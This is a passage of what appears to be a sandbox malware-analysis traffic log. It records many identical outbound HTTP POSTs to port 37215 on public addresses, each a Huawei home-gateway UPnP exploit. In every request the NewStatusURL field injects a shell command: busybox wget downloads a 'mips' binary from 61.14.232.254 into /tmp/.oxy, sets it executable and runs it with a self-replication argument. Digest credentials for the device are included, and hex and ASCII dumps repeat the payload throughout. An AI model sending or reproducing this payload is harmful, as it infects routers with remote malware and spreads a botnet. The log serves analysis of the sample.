3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1126192.168.2.134205841.238.214.3137215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:18.506974936 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1127192.168.2.134692841.206.32.19037215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:18.507004023 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1128192.168.2.135376653.181.31.14837215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:18.507030010 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1129192.168.2.1355024157.120.109.5537215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:18.507060051 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1130192.168.2.135933250.18.98.17137215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:18.507213116 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1131192.168.2.135760041.163.191.2037215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:18.507242918 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1132192.168.2.134440841.76.0.5537215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:18.507271051 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1133192.168.2.1341740195.186.207.13837215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:18.507297993 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1134192.168.2.134244041.25.4.22237215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:18.507318974 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1135192.168.2.1332772197.187.193.15137215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:18.507345915 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1136192.168.2.134124841.155.239.10837215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:18.507383108 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
